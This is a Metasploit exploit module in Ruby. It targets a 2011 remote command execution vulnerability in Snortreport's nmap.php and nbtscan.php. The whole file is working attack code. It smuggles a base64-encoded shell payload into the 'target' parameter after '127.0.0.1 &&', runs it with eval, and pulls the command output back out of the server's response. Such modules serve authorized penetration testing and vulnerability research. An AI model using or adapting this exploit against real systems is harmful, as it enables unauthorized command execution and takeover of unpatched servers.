##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Snortreport nmap.php/nbtscan.php Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in
        nmap.php and nbtscan.php scripts.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Paul Rascagneres'  #itrust consulting during hack.lu 2011
        ],
      'References'     =>
        [
          ['OSVDB', '67739'],
          ['URL', 'http://www.symmetrixtech.com/articles/news-016.html']
        ],
      'Payload'        =>
      {
        'Compat'     =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic perl ruby telnet python',
        }
      },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => 'Sep 19 2011',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
      ])
  end

  def exploit
    base64_payload = Rex::Text.encode_base64(payload.encoded)

    start = "127.0.0.1 && echo XXXXX && eval $(echo "
    last  = " | base64 -d) && echo ZZZZZ"
    custom_payload = start << base64_payload << last

    res = send_request_cgi({
      'uri'       => normalize_uri(datastore['URI']),
      'vars_get'  =>
      {
        'target' => custom_payload
      }
    },10)

    if (res)
      to_print=false
      already_print=false
      part=res.body.gsub("<BR>","")
      part.each_line do |line|
        if line =~ /ZZZZZ/
          to_print=false
        end
        if to_print == true
          print(line)
        end
        if line =~ /XXXXX/
          already_print=true
          to_print=true
        end
      end

      if already_print == false
        print_error("This server may not be vulnerable")
      end
    else
      print_error("No response from the server")
    end
  end
end
